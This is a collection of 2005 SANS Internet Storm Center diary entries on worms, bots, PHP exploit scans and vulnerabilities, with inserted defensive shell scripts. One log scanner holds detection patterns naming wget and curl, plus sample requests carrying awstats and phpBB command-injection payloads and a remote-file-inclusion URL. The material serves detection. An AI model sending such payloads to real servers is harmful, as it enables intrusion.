I would do the same as I already did for my daughter (she got a 2nd hand PC as an early Christmas present) and install Ubuntu linux plus the codecs required to access some non-free audio and video.

Merry Christmas and a safe and prosperous new year to all the handlers.

From Anonymous:

If my parents had a computer for Xmas:

I would hope it is a Macintosh.

First and foremost because they are easier to use, so fewer support calls...

But also because they are somewhat less prone to the on-going barrage of malware and viruses and all around pests that make computing such a pain.

If it is not a Mac, then I just got myself a free weekly dinner on Sundays...


Published: 2005-12-24

Parents and Computers

We compiled the information that many people sent to us over the past few days to answer the question, "if your parents got a new computer for Christmas, what would you tell them to do?"  The long list of ideas, poems, and thoughts are here.

From all of us at the ISC, we wish you the merriest of holidays and best wishes in the coming year!


Published: 2005-12-23

Bots: They are not just for Windows anymore.

A couple of readers noted the use of the "kaiten" bot in some of the recent PHP exploits. The PHP vulnerability is used to install kaiten, which, like all well-behaved bots, connects to an IRC channel and does its master's bidding.

We have kind of gotten used to seeing "bots" as a Windows issue. But to be fair: Kaiten probably pre-dates a lot of the Windows worms and bots. IMHO it is so much easier to write a bot for Linux. You have perl, after all. I wouldn't be surprised to find one written in bash.

One really quick and dirty way to fool bots on Linux: make /tmp its own partition and mount it noexec. This will probably fool 80% of the bots, as they start out by writing themselves to /tmp. Don't forget to make /usr/tmp and /var/tmp symlinks to it. If you don't want to repartition, use a loopback file. Most Linux malware compiles itself on the target system, so removing development tools is always an option, but a painful one for many. And you may not be able to do without perl. I wouldn't be able to make coffee in the morning without it, and without coffee not much would be happening here.
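Here is the loopback variant of that trick, as an added example that is not from the diary: one function builds the image, adds the fstab entry, mounts /tmp noexec/nosuid/nodev and turns /usr/tmp and /var/tmp into symlinks; a second one reads /proc/mounts-style text and tells you whether the mount really carries those options. The image path and size, and the sample mount table, are this example's own assumptions.

```sh
#!/bin/sh
# Added example, not from the diary: give /tmp its own loopback-backed
# filesystem mounted noexec,nosuid,nodev, point /usr/tmp and /var/tmp at it,
# and audit the result from /proc/mounts. Image path and size are assumptions.
# setup_loop_tmp needs root; check_tmp_opts is plain text processing.

setup_loop_tmp() {
    img=${1:-/var/tmpfs.img}
    size_mb=${2:-512}
    dd if=/dev/zero of="$img" bs=1M count="$size_mb"
    chmod 600 "$img"                      # the image must not be world-readable
    mkfs.ext3 -F "$img"                   # -F: it is a file, not a block device
    printf '%s /tmp ext3 loop,noexec,nosuid,nodev 0 0\n' "$img" >> /etc/fstab
    mount /tmp
    chmod 1777 /tmp                       # sticky, world-writable, as /tmp must be
    # The diary's advice: the other tmp directories become symlinks to /tmp,
    # so malware writing to /var/tmp lands on the noexec filesystem too.
    for d in /usr/tmp /var/tmp; do
        [ -L "$d" ] && continue
        [ -d "$d" ] && mv "$d" "$d.old"   # keep old contents; clean up by hand later
        ln -s /tmp "$d"
    done
}

# check_tmp_opts MOUNTPOINT: reads /proc/mounts-style text on stdin, prints the
# mount options in effect, exit 0 only if noexec, nosuid and nodev are all set.
check_tmp_opts() {
    mnt=$1
    opts=$(awk -v m="$mnt" '$2 == m { o = $4 } END { print o }')
    [ -n "$opts" ] || { echo "no separate mount at $mnt"; return 2; }
    echo "$opts"
    for need in noexec nosuid nodev; do
        case ",$opts," in
            *,"$need",*) ;;
            *) return 1 ;;
        esac
    done
    return 0
}

# Constructed /proc/mounts sample (not captured from a real host).
SAMPLE_MOUNTS='/dev/hda1 / ext3 rw 0 0
/dev/loop0 /tmp ext3 rw,noexec,nosuid,nodev 0 0
tmpfs /dev/shm tmpfs rw 0 0'

# Real use on a host: check_tmp_opts /tmp < /proc/mounts
```

Two caveats worth knowing before you rely on this: noexec only stops a bot that runs `/tmp/bot` directly, not one that is started as `perl /tmp/bot.pl` or `sh /tmp/x`, which is why the diary talks about a percentage rather than all of them; and moving an existing /var/tmp out of the way while services are running can upset those services, so do it at a quiet moment.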

We do get LOTS AND LOTS of reports about various PHP exploit attempts. It's one of those things where, if you are vulnerable, you have probably long since been exploited. The exploit attempts target a long list of vulnerable PHP applications. Nothing particularly fancy, just more and more of it.


Published: 2005-12-23

Getting Ready for the Holidays

We had a couple of reports from readers who tried to contact abuse departments or notify companies about breached systems, only to receive a "vacation" reply indicating that the systems are on autopilot until sometime next year.

Unless you turn the systems off, they will still need a bit of watching and care. Do you have someone on call in case the burglar alarm goes off? Make sure you have someone checking the 'abuse' and 'security' mailboxes at least once a day. You may even have them forwarded to a pager, if you can filter the spam.

And while I am on the topic: make sure you actually have an 'abuse' and a 'security' alias for all of your domains. There are a number of aliases you should define for each of your domains:

RFC2142 provides a number of references to other RFCs, and suggests the following aliases (among others):
  • postmaster@domain (RFC822). This should exist on all mail servers. You should also have postmaster@IP-Address-of-the-mail-server.
  • usenet@domain (RFC977). I know a lot of people will write to say differently. But I consider usenet dead for all practical purposes. You can probably do without this address.
  • abuse@domain
  • trouble@domain
  • noc@domain
  • security@domain
Take a look at your domain name and IP address whois entries and make sure they are current. For IP addresses, you may just find your ISPs contact info, which is fine as long as they notify you.
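Checking that the aliases exist is easy to forget, and an alias that exists but is routed to /dev/null is no better than a missing one. The following is an added example, not from the diary: it audits a sendmail/postfix-style aliases file for the role mailboxes listed above and flags both cases. The required set and the sample aliases file are this example's own choices.

```sh
#!/bin/sh
# Added example, not from the diary: audit a sendmail/postfix-style
# /etc/aliases for the RFC 2142 role mailboxes the diary calls out, and flag
# any that are defined but routed to /dev/null (an alias nobody reads is as
# good as a missing one). The required set below is this example's choice.

REQUIRED="postmaster abuse noc security trouble"

# audit_aliases: aliases file text on stdin; prints one line per problem
# ("missing: abuse" or "blackholed: abuse -> /dev/null"); exit 0 when clean.
audit_aliases() {
    # Normalise the file to one "name target" line per alias, joining
    # continuation lines (leading whitespace) onto the previous record.
    aliases=$(awk '
        /^[ \t]*#/ || /^[ \t]*$/ { next }
        /^[ \t]/ { target = target " " $0; next }
        name != "" { print name, target }
        { split($0, kv, ":"); name = tolower(kv[1]); target = substr($0, index($0, ":") + 1) }
        END { if (name != "") print name, target }
    ')
    rc=0
    for want in $REQUIRED; do
        line=$(printf '%s\n' "$aliases" | awk -v w="$want" '$1 == w { print; exit }')
        if [ -z "$line" ]; then
            echo "missing: $want"; rc=1
        else
            case "$line" in
                *"/dev/null"*) echo "blackholed: $want ->${line#"$want"}"; rc=1 ;;
            esac
        fi
    done
    return $rc
}

# Constructed sample aliases file (not from any real system).
SAMPLE_ALIASES='# Basic system aliases -- these MUST be present.
postmaster:     root
MAILER-DAEMON:  postmaster
# Role accounts
abuse:          /dev/null
security:       secteam@example.com,
                oncall-pager@example.com
noc:            root'

# Real use on a mail server: audit_aliases < /etc/aliases
```

Run it against every domain's alias source, not just the primary one; virtual-domain tables are where abuse@ most often goes missing.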

Spam to these addresses has become a problem. I don't think there is a great solution, as some of the mail sent to these mailboxes will legitimately include copies of spam messages: even if you don't send spam, others may impersonate you, and you still want to know about it. Abuse reports are one way you will find out.

I can't find a reference right now (but I am sure someone will write in with the correct RFC), but it is commonly suggested to also maintain a '/security' URL on all your websites. This URL should provide contact information for security issues and information about security patches for any products you offer. But this convention, while useful, is not widely implemented (is it still a 'standard'?).

Last but not least: Have fun this weekend. I think I will run some network cable in my house (already got the big drill, but still need one more Home Depot trip for some conduit). The holiday security guide should be live sometime tomorrow. We got some great input.


Published: 2005-12-23

Update - Symantec RAR File Parser Remote Heap Overflow

ISS X-Force's Symantec RAR File Parser Remote Heap Overflow analysis says "The likelihood of this vulnerability being leveraged by a worm is low as successful exploitation requires a very large RAR file, in the area of 35-40MB. Files this large are not generally passed by mail servers and can eliminate this as a vector for a worm. X-Force believes this is still a serious threat since the vulnerability can be leveraged to exploit AV mail gateways. Desktops which employ the on-demand scanning function could also be exploited without user intervention when scanning files downloaded by FTP or HTTP on the desktop."

Thank you for the information X-Force!

Symantec's announcement -
SYM05-027, December 21, 2005, Symantec AntiVirus Decomposition Buffer Overflow


Published: 2005-12-22

Santa IM Worm (bot) update

More details came to us on the Santa IM worm discussed earlier.  We were able to capture and examine the malware and found that is hosting it.  When executed, gift.com resolves smtp.girlsontheblock.com to and attempts connections to tcp/53.  If we discover more details we will issue further updates.

Further info: gift.com renames itself to c:\windows\winrpc.exe and sets itself up as the service "Windows RPC Services". There is no rootkit built in; it is totally dependent on download instructions from the command and control site. Rather than calling it a "worm" as was reported in the press, a more accurate description is that it is a bot with replicating capabilities. Digging a bit deeper into the code, we found that it was also likely compiled/pushed to the distribution point on 2005-12-18 18:09:11.000000000 -0500.


Published: 2005-12-22

Exploits in the wild for several PHP-based web apps

Those of you that run web servers have probably noticed in your logs that there is a lot of scanning activity looking for vulnerabilities in PHP or web applications that are written in PHP.  Even after all these months there are still scans for the old awstats vulnerability and the XML-RPC vulnerabilities in PHP itself from a few months back.  Well, there are a couple of new ones in the last week or so that I thought deserved a mention.

Several days ago Secunia issued a bulletin discussing a new vulnerability in phpBB 2.0.18 (which is the latest version and which, unfortunately, has been a pretty popular target over the last year or so). Fortunately, the vulnerability can only be exploited if a couple of settings are changed from their defaults to values that open your web server to a lot more problems than just this one. Having said that, the exploit is now in the wild, so if you are running phpBB, make sure that you follow the recommendations and that "Allow HTML" and register_globals are both disabled. One of our intrepid readers also noticed that an exploit has been posted in several places that will do brute-force dictionary attacks to get the passwords of phpBB users.

Also, a couple of days ago a worm started making the rounds exploiting a vulnerability in the genealogy application PhpGedView.  The authors have posted patches here which users are encouraged to apply as soon as possible.
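The scanning this entry and the "Bots" entry above describe shows up clearly in web server logs if you look for it. The following is an added example, not from the diary: a shell/awk pass over an Apache combined-format access log that tags requests matching the well-known scan patterns (awstats configdir injection, PHP XML-RPC probes against xmlrpc.php, phpBB viewtopic highlight injection, and a generic "fetch something remote via the query string" catch-all) and counts hits per client. The signature list and the sample log lines are this example's own constructions, not an ISC list.

```sh
#!/bin/sh
# Added example, not from the diary: flag PHP-application exploit scans in an
# Apache combined-format access log. The patterns are this example's own
# choice of the scan types the diary mentions; tune them to your logs.

# scan_log: log lines on stdin; prints "client_ip tag path" for each hit.
scan_log() {
    awk '
    {
        ip = $1
        # The request is the first double-quoted field: METHOD PATH PROTOCOL.
        split($0, q, "\"")
        req = q[2]
        split(req, r, " ")
        method = r[1]; path = r[2]
        tag = ""
        if (path ~ /awstats\.pl\?.*configdir=/)                          tag = "awstats-configdir"
        else if (method == "POST" && path ~ /xmlrpc\.php/)               tag = "php-xmlrpc"
        else if (path ~ /viewtopic\.php\?.*highlight=.*(%27|%2527)/)     tag = "phpbb-highlight"
        else if (path ~ /(wget|curl|lynx)%20/ || path ~ /=(http|ftp):\/\//) tag = "remote-fetch"
        if (tag != "") print ip, tag, path
    }'
}

# count_hits: same input; one line per client, "count ip", busiest first.
# Useful for deciding what to block at the proxy or report to abuse@.
count_hits() {
    scan_log | awk '{ n[$1]++ } END { for (ip in n) print n[ip], ip }' | sort -rn
}

# Constructed sample log (not real traffic); client IPs are RFC 5737
# documentation addresses.
SAMPLE_LOG='198.51.100.7 - - [22/Dec/2005:10:01:02 +0000] "GET /cgi-bin/awstats.pl?configdir=%7Cid%7C HTTP/1.1" 404 209 "-" "Mozilla/4.0"
198.51.100.7 - - [22/Dec/2005:10:01:03 +0000] "POST /xmlrpc.php HTTP/1.1" 404 209 "-" "Mozilla/4.0"
203.0.113.9 - - [22/Dec/2005:10:05:44 +0000] "GET /forum/viewtopic.php?t=1&highlight=%2527.system(chr(105).chr(100)).%2527 HTTP/1.0" 200 5123 "-" "Mozilla/4.0"
192.0.2.33 - - [22/Dec/2005:10:07:00 +0000] "GET /index.php?page=http://example.com/x.txt? HTTP/1.1" 200 812 "-" "libwww-perl/5.79"
192.0.2.50 - - [22/Dec/2005:10:08:10 +0000] "GET /forum/viewtopic.php?t=42 HTTP/1.1" 200 9981 "-" "Mozilla/5.0"'

# Real use: scan_log < /var/log/apache2/access.log ; count_hits < access.log
```

A 404 on one of these requests means the scanner missed; a 200 on an awstats or xmlrpc.php hit on a server that actually runs those applications is the line to investigate first, since, as the diary says, if you were vulnerable you were probably exploited long ago.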

Jim Clausing, jac /at/ isc.sans.org


Published: 2005-12-22

Help us out with a Christmas story

With the holidays coming up this weekend, we're looking for some input from our readers on a story we'll publish on Saturday.  The question to you is, if your parents got a new computer for Christmas, what would you tell them to do?  Please send your ideas to the handlers through the contact page and we'll summarize.


Published: 2005-12-22

Update on the SUS issues

We told you about issues with Microsoft's Software Update Service (SUS) version 1 last week. Yesterday, Microsoft released yet another update to their Approval Analyzer Tool. They also updated Knowledge Base article 912307 to version 5. Anyone still having problems with SUS after this month's updates should take a look at the updated article and tool. Note that version 2 was not affected by this issue. Thanks to several of our faithful readers, including Juha-Matti, for bringing this latest update to our attention.

Jim Clausing,  jclausing /at/ isc.sans.org


Published: 2005-12-22

Santa IM Worm

One of our attentive readers sent us a note yesterday and we missed posting it in the diary.  There's a nasty present waiting under your IM tree if you have been naughty this past year.  Read on...

Techweb -

"A new worm posing as a come-on to a Santa Claus site is traveling across all the major instant messaging networks, a security firm warned Tuesday, and when recipients visit the bogus site, they're infected with a file hidden from sight by a rootkit. IMlogic said that the worm, dubbed "M.GiftCom.All," is circulating on the MSN, AOL, ICQ, and Yahoo instant messaging services, is a "Medium" threat, a relatively rare classification for the Waltham, Mass.-based company. Most IM worms and Trojans listed on its Threat Center receive only a "Low" classification. Like virtually all IM worms, M.GiftCom.All includes a URL in messages it spams out to contacts hijacked from previously-infected PCs. When users naively visit that site -- which is billed as a harmless Santa site -- a file is automatically downloaded to their computers. The file, usually named "gift.com" includes rootkit elements that cloaks it from security software. In addition, the downloaded executable tries to disable a number of anti-virus programs, adds a keylogger to the system to capture confidential information, and then spreads to others by snatching names from the user's IM client contact list..."

IM Logic

"...Description: This worm broadcasts a URL out over IM clients which downloads an executable file, often named gift.com. When this file is executed, it hides itself and scans the registry, file system, and internet cache. By operating as a rootkit, the process is hidden from all tools and anti-virus software. It also attempts to shut down anti-virus software and makes several networking calls. Also it does keystroke logging and may attempt to propagate itself over IM clients..."


Published: 2005-12-21

* VMWare vulnerability announced and fixed

A report showed up on the bugtraq and vulnwatch mailing lists in the last few hours about a vulnerability (discovered by Tim Shelton) in a number of VMWare products (including Workstation, GSX, ACE, and Player) that would allow an attacker to escape the virtual machine and execute code in the underlying host OS. There are new builds dated 20 Dec on their website which correct the issue (VMWare Workstation 5.5 is now up to build 19175, for example), and the bulletin has a timeline section stating that VMWare acknowledged the vulnerability when they released the new builds. This one is pretty significant for folks who use VMWare for malware analysis or even to isolate/sandbox their web browsing; you are urged to update to the latest build or disable NAT as soon as possible. From looking at the bulletin, it appears that Mr. Shelton has created a Metasploit module to exploit this vulnerability.

The vulnwatch article is here.
The Secunia advisory is here
VMWare's response is here.

Jim Clausing, jclausing at isc.sans.org


Published: 2005-12-21

Symantec AV RAR library vulnerability

Yesterday, Alex Wheeler released details of a vulnerability that appears to span many Symantec A/V products, in the routines for decoding RAR compressed files. Symantec is apparently working feverishly on a fix, but for the moment the recommendation is to disable scanning of these files (which I suppose is fine if we can convince the users not to open/uncompress them until Symantec has a fix or they can be scanned by some other A/V product) or to block them completely at gateways/proxies. We are not currently aware of exploits in the wild, but the concern is that this has occurred so close to the end-of-year holidays: even if a fix does come out in the next few days, will people be around to apply it?

For complete details see, the Bugtraq posting, the Secunia advisory, and what I believe is Alex's paper.

We'll bring you more info as it becomes available.

Jim Clausing, jclausing at isc.sans.org


Published: 2005-12-21

Updated RSS Feed

We updated the RSS feed from 0.91 to 2.0 this morning, and added partial diary content in addition to the headlines. There are a couple of reasons why we did that:
  • RSS 2.0 should now be understood by most aggregators. When we originally started offering the RSS feed two years ago, RSS 0.91 was the most commonly used standard.
  • RSS 2.0 allows us to include a 'TTL', which indicates to the RSS reader how frequently to refresh the feed. Let's see if this helps a bit with overly busy readers.
  • We do get regular requests to include full diary content.
For a lot of readers, RSS has become the way to go to stay up to date. However, from a web site operator's point of view, RSS does have a couple of problems. The "pull" nature of RSS can cause high loads on the site, even if nothing actually changed, as the RSS readers keep polling the site for updates. For example, yesterday we had about 12,000 different IPs accessing our RSS feed, polling it 250,000 times. So that's about 20 polls/user/day.

Now the advantage is of course that the RSS feed is a static page, and doesn't take a lot of resources to serve.

Another problem with RSS feeds is less technical: The ISC site does not want to be just a "news feed". In order to work, we do need you to interact with the site, and support us by providing reports about incidents and other feedback. Using an RSS reader will remove you from the actual site and lead to a more passive use. This is one reason why we will not offer full content of diary entries. For now, I added a "teaser" (first 100 characters). A technical problem with adding diary content is the fact that we have to strip links and characters that are not supported by the RSS standard.

Special note for Firefox users: You may see an odd character at the beginning of each headline but the first two. This is due to the fact that there is a new line at the start of each subject. For now, this is necessary to support the "iscalert" taskbar application. The feed is valid according to the validators I checked, so as far as I am concerned this is a bug in Firefox.

And don't forget that you can always get alerts of new diaries via e-mail: sign up here


Published: 2005-12-20

Finding abuse contacts for a domain

    One poster to the handlers list asked if there is an easy way to find the abuse contact for a domain.  Abuse.net maintains a database of abuse contacts that's reachable via a web link or dns or whois lookup.


Published: 2005-12-20

Cisco EIGRP Vulnerability and VLAN spoofing issue

Cisco has put out advisories today concerning vulnerabilities in their EIGRP and VLAN implementations.  Their EIGRP post can be found at:
and the VLAN issue is at:


Published: 2005-12-20

Malware Analysis Quiz 5 results

For those following my quizzes, today I released the results of Malware Analysis Quiz 5.
That one was really great and I would recommend that those interested in malware analysis read them!
Now, I will take a break from it until January and will post new quizzes in 2006!
Thanks a lot for all submitters!
Pedro Bueno ( pbueno //&&// isc. sans. org)


Published: 2005-12-19

IIS 5.1 DoS exploit released

A Denial of Service (DoS) exploit against IIS 5.1 was brought to our attention. Source code of the exploit is being distributed from multiple sites. The claimed effect of the exploit is to stop the inetinfo.exe process.

We have warned Microsoft and are awaiting a reaction from them.

We will update this story as we receive confirmation that the code works and/or Snort IDS signatures.

The smartest mitigation strategy at this point is to plan an upgrade to the most recent version of IIS.

Swa Frantzen


Published: 2005-12-19

Malware samples

It seems there is somewhat of a peak in reports of malware that scans for vulnerabilities and is currently not detected by the anti-virus products.

If you have samples of the malware, our malware team can have a look. You can upload them through our contact form.

Swa Frantzen


Published: 2005-12-18

Wrap-up: What? No Link?

Our handler John Bambenek, in his diary from December 7th, noted the dangers of posting URLs, in particular clickable URLs, on our site. To drive the point home, he added a "suspect" URL, and we tracked how many people clicked on it. We had about 1,000 users click on the link. 80% used the same browser they used to read the diary, so I consider them "production browsers". 10% used "safe browsers" like wget. The remainder are bots/search engines that followed the link. Most people who responded to the diary noted that they do need access to malicious code (and malicious URLs) in order to be able to block them at their web proxies, or that they use safe browsers to access suspicious links. We will continue to post links in our diaries. It is up to the particular handler to decide whether it is appropriate to obfuscate the URL, post a partial URL, or not post it at all if it is deemed inappropriate or too risky.


Published: 2005-12-17

Artemis Project's N-Eye

While checking out the Chinese Honeynet Project, I happened upon their tool N-Eye:

It looks fun.


Published: 2005-12-17

On Dasher

Despite efforts to cut off the distribution points (http://www.honeynet.org.cn/honeyneten/index.htm) new versions of Dasher continue to pop up.  Symantec identified Dasher.C yesterday that added an anti-security-software payload (your typical disable anti-virus and firewall type of gig.)  New versions with new distribution points, and signature-evasion changes continue to come out.  Before you ask: "which ones don't detect it?"  Right now, it's most of them.  In a few hours, I hope that list to be much shorter.

It would be simply swell if the AV developers would write sigs for the samples that we're sending them.  I know it's a weekend... but I'm working.

So, why is Dasher "finding legs"? Or, why is it successful?

To answer that, we have to ask Microsoft: why are services listening on ephemeral ports? Or, why are some filtering/firewall strategies blocking only ports 1024 and below?

Overall, the response procedure appears to be working. The 1025/TCP scans were detected, packets were gathered, the vector was identified, examples of the code were captured, and command-and-control points were neutralized. Everything went according to plan, just not as quickly as I had hoped.

Now, I'm waiting for Prancer.


Published: 2005-12-16

Visualization of Dasher worm

The honeynet folks sent us a link to their research on the MSDTC exploit that is attacking TCP port 1025 (the Dasher worms).  This is very interesting stuff, especially if you like statistical analysis:


Published: 2005-12-16

Hotmail and MSN problems

Looks like Hotmail and MSN are having problems receiving mail from specific Internet Service Provider networks.  They are blaming the problem on high mail volume, partly due to the Sober worm.  More information here: http://www.msnbc.msn.com/id/10301008/


Published: 2005-12-15

New Beagle on the war path

A new Beagle/Bagle variant is making the rounds. It comes in an almost empty email, as a ZIP attachment containing the worm as an EXE. The attachment name, email subject and sole text content of the email all seem to be male or female names. Keep your eyes peeled, especially if your users are reading their mail over webmail, as it seems to take another couple of hours until the AV vendors have their patterns lined up.

Update 23:10 UTC: It took most of the AV vendors their sweet time to get the patterns out for this one. Now things slowly start to look a bit more cheerful, though we know of at least one vendor where the Beagle/Bagle attachment still sails right through the filter, even though the vendor website claims that protection is in the current pattern. If you are not already blocking all .exe (and .exe within .zip) on your email gateway, days like today should maybe make you reconsider.


Published: 2005-12-15

If MS05-054 doesn't apply correctly...

Shinil Hong of SUNY Buffalo has sent us his analysis of problems encountered with the installation of MS05-054. Here's what Shinil found out: the cumulative Internet Explorer patch fails to install when the ProgramFilesDir value in the HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion registry key points to a manually changed drive letter that differs from the default %SystemDrive%\Program Files path (e.g. C:\Program Files). The U.S. distribution versions of Microsoft Windows Server 2003 and XP ship with Internet Explorer 6.0 installed by default in the %SystemDrive%\Program Files\Internet Explorer\ directory. If the ProgramFilesDir registry value points to D:\Program Files, for example, while the actual program directory of Internet Explorer is C:\Program Files\Internet Explorer, the patch installer will attempt to update the empty D:\Program Files\Internet Explorer directory and eventually fail. As a workaround, change the registry value back to the default while applying the update.
[Note: This problem description and resolution has not yet been verified by SANS ISC]


Published: 2005-12-15

LAND attacks against network devices

A "LAND" attack involves IP packets where the source and destination address are set to the same device. Older variants, as reported earlier at http://isc.sans.org/diary.php?date=2005-03-07, rely on the source address being spoofed to the same value as the destination IP. A recent post to Bugtraq came up with a new twist: LAND attacks against routers and perimeter devices, addressed to the outside interface and with the source spoofed to the address of the inside interface. Rumour has it that these attacks are easily conducted and surprisingly "successful". The defense, though, is just as simple: packets with spoofed source addresses have no business entering your perimeter networks. If you have not yet applied ingress filtering on the outermost devices of your Internet connection that you have control over, now is a good time to do so. RFC 2827 and RFC 3704 are good sources of information on ingress filtering and Reverse Path Forwarding. And while you're at it updating your filters, don't forget to apply outbound spoofing filters as well - see this paper in the SANS Reading Room for details.
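What those filters look like on a Linux perimeter box, as an added example that is not part of the diary: an iptables chain that drops anything arriving on the outside interface with our own address or an inside address as source (the LAND twist above), drops anything leaving the inside with a source that is not ours (the outbound filter), and turns on the kernel's reverse-path check as a second layer. The same decision is written out as a plain shell function so you can test the policy against the LAND cases without touching a live firewall. Interface names and addresses are this example's assumptions (RFC 5737 documentation ranges).

```sh
#!/bin/sh
# Added example, not part of the diary: anti-spoofing filters for a Linux
# perimeter box in the spirit of RFC 2827 (ingress) and RFC 3704 (reverse
# path), plus a pure-shell copy of the decision logic so the rules can be
# checked without root. Interface names and addresses are assumptions.

OUTSIDE=eth0                    # internet-facing interface
INSIDE=eth1                     # internal interface
OUTSIDE_ADDR=203.0.113.5        # address of the outside interface
INSIDE_NETS="192.168.1.0/24 10.0.0.0/8"   # legitimate sources behind $INSIDE

# ip2int DOTTED-QUAD: prints the address as an integer (64-bit shell arithmetic).
ip2int() {
    IFS=. read -r a b c d <<EOF
$1
EOF
    echo $(( a * 16777216 + b * 65536 + c * 256 + d ))
}

# in_net IP CIDR: exit 0 if IP falls inside CIDR.
in_net() {
    ip=$(ip2int "$1")
    net=$(ip2int "${2%/*}")
    bits=${2#*/}
    mask=$(( (0xFFFFFFFF << (32 - bits)) & 0xFFFFFFFF ))
    [ $(( ip & mask )) -eq $(( net & mask )) ]
}

# filter_decision IN_IFACE SRC: prints "drop" or "accept", mirroring apply_rules.
filter_decision() {
    iface=$1; src=$2
    if [ "$iface" = "$OUTSIDE" ]; then
        # Ingress: a packet from the Internet must not claim to be us (classic
        # LAND) or to come from inside (the new twist: dst = outside interface,
        # src = inside interface address).
        [ "$src" = "$OUTSIDE_ADDR" ] && { echo drop; return; }
        for n in $INSIDE_NETS; do
            in_net "$src" "$n" && { echo drop; return; }
        done
    elif [ "$iface" = "$INSIDE" ]; then
        # Egress: packets leaving the inside must carry an inside source, so
        # our own hosts cannot be used to spoof somebody else.
        ok=1
        for n in $INSIDE_NETS; do
            in_net "$src" "$n" && ok=0
        done
        [ $ok -eq 0 ] || { echo drop; return; }
    fi
    echo accept
}

# apply_rules: the same policy as iptables rules (run as root). ANTISPOOF is
# consulted before anything else in INPUT and FORWARD.
apply_rules() {
    iptables -N ANTISPOOF 2>/dev/null || iptables -F ANTISPOOF
    iptables -A ANTISPOOF -i "$OUTSIDE" -s "$OUTSIDE_ADDR" -j DROP
    for n in $INSIDE_NETS; do
        iptables -A ANTISPOOF -i "$OUTSIDE" -s "$n" -j DROP
        iptables -A ANTISPOOF -i "$INSIDE"  -s "$n" -j RETURN
    done
    iptables -A ANTISPOOF -i "$INSIDE" -j DROP
    iptables -I INPUT   1 -j ANTISPOOF
    iptables -I FORWARD 1 -j ANTISPOOF
    # Second layer: strict reverse-path check in the kernel (RFC 3704 style).
    sysctl -w net.ipv4.conf.all.rp_filter=1
}
```

The rule set deliberately does not try to enumerate every "bogon" range; the point the diary makes is the simple one, that nothing arriving from outside may carry one of your own addresses, and nothing leaving may carry anyone else's.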


Published: 2005-12-15

MS05-051 (MSDTC) Malware / Port 1025

A blog entry over at F-Secure mentions a new piece of malware dubbed "Dasher.A" that is trying to exploit the MS05-051 (MSDTC) vulnerability. The spreading mechanism seems to be very unreliable, but it likely explains the surge in port 1025 traffic we've seen recently. The captured packets look a lot like what the MS05-051 POC exploit posted at FrSIRT.com would cause. [Thanks to Juha-Matti and David for reporting this.]

Update 15:27 UTC: Georg Wicherski from the German Honeynet Project has successfully captured the full exploit, including payload, on one of these tcp/1025 attacks. The payload will be called Dasher.B by F-Secure - and unlike the .A variant, this one does work, and drop a keylogger. Georg is planning to update mwcollect with MS05-051 detection and capture code over the next days.


Published: 2005-12-14

Greetings awareness - Awareness greetings ?

It is the seasonal greetings time of the year again and with the migration from the traditional postal cards to short text messages, e-mails and e-cards it's time to warn users of the dangers associated with the e-mails and e-cards.


Plain text messages obviously carry little risk and don't need warnings. It gets worse when there are attachments involved. Some of these attachments will not be just a simple picture; many will include executable programs, and those attachments might contain gifts you just do not want to receive. The best policy is to ignore wishes from people you do not know to start with, and to be extremely careful with attachments to e-mails even from people you do know. Let's face it: many of those attachments are not created from scratch by the well-wisher; they contain foreign components whose creator you may not have the needed trust in.

Also show the good example and just send plain old text messages to your contacts. It's a matter of leading by example. We'll come back to this ...


E-cards are a different story. From a sender's perspective, there are a number of companies trying to offer a responsible service but how do you recognize them? If you use one of the services you give the company behind it the list of e-mail addresses of your friends. If the company is trustworthy that should cause little concern, but how can you be sure?

On the receiving end it gets worse: sometimes the card says who tried to send you something, sometimes it doesn't. Sometimes you know the company sending you the e-card, sometimes you've never heard of them. You do know that the sender sometimes gets a confirmation that you went and read the card.
If you read this regularly, you might even be aware of possible cross-site scripting issues that could be exploited somehow.

So what to do?

Start your own chain of secure greetings this year

Send out your e-mail greetings early this year to your contacts. Keep it plain text and ask them to please not send you e-cards, as you will not read them this year for security reasons.

If enough people do that, there will hopefully be a few less incidents of people getting infected with all sorts of malware and loss of privacy.

Swa Frantzen


Published: 2005-12-14

Black tuesday - the day after

Traditionally we brace for impact on the Wednesday after the second Tuesday of the month. So far today has been rather uneventful. A big part of the reason is probably that the important update actually fixes things that have already been exploited and are therefore already past their peak.

So in summary: make sure you grab the MS05-054 update. It has fixes for things that have been exploited since last month.
It also fixes 3 more vulnerabilities, but the one actively exploited vulnerability makes this patch mandatory.

Swa Frantzen


Published: 2005-12-13

PCI Compliance

For those that have not heard, Computerworld is reporting that Sam's Club is investigating a security breach involving credit card data. It is going to be very interesting to see how the major credit card companies enforce the PCI (Payment Card Industry) standards on large or small merchants.

Just thinking back, I do not remember a diary about the PCI standards, but I have slept once or twice in the past year since they came into existence. So for those that have missed this: the major credit card companies have developed a set of data security standards that merchants need to comply with. This includes Sam's Club and other large merchants, all the way down to the coffeehouse down the street that may only process 20,000 transactions in a year. (Personally I think that some subset of these standards should also apply to merchants with a single transaction _ever_.)

As IT security professionals, are you aware of the locations within your company that process credit card transactions? If you aren't, take a closer look; there is probably one somewhere in most companies. Has your business complied with the PCI standards? If it hasn't, you need to get moving, because you are about 6 months late.

If you are looking for resources to catch up on PCI standards,  here are a few sites where you can get more information.  If any of you have other good resources, please go ahead and post them our direction.  I will update the below list with a more comprehensive list.


SANS PCI Webcast - November 2005
Visa Cardholder Information Security Program


Published: 2005-12-13

Gmail SSL Cert Expiration

For those that use POP3 access to Gmail, you have most likely seen some problems this afternoon with access.  We have received reports that one of the SSL certificates used within the certificate chain has expired.  We are investigating this, and hope to have something more to report later.

Update (22:30 UTC):  This seems to have been resolved in the past hour.  Not exactly sure what happened, but I guess that is what you get for using beta software, right?  In any case, thank you Google for the free 2.6G and growing disk space.


Published: 2005-12-13

Microsoft December Patches

Details about the MSFT December patches just showed up online. We will update this page as we find out more.

MS05-054: Cumulative Security Update for Internet Explorer

First look: This DOES NOT fix the javascript window() issue. Still translating from "Microsoft" to "English".


MS05-055: Vulnerability in Windows Kernel Could Allow Elevation of Privilege.

A vulnerability in the Asynchronous Procedure Call queue allows local users to escalate their privileges. A regular user (who has to be logged in first) could use this vulnerability to gain Administrator privileges.
Microsoft rates this vulnerability as "Important" as there is no direct remote vector to exploit this issue. However, coupled with an Internet Explorer vulnerability or similar issues, this could be used to gain Administrator privileges even if a user runs Internet Explorer as a less privileged user.
Note that remote exploitation may be possible if user credentials are known.


Published: 2005-12-11

Port 53 Back on the Radar

